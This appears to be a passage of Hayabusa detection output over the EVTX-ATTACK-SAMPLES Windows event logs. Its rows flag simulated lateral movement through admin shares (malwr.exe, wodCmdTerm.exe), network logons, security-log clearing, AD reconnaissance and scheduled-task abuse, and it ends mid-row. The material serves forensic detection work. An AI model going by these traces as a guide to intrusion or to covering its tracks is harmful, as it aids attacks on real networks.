+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 
0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:43.570 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.179 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49237 : LogonID: 
0x17e2c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2d2,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.319 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\CYAlyNSS timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 09:02:04.351 
+09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.367 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.398 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.430 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.445 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP 
Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.508 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:07.523 +09:00,WIN-77LTAPHIQ1R.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\CYAlyNSS.tmp : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:16.835 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:17.117 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:21.929 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : 
IP Address: fe80::79bf:8ee2:433c:2567 : Port: 56034 : LogonID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-20 02:22:24.761 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 02:22:24.851 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 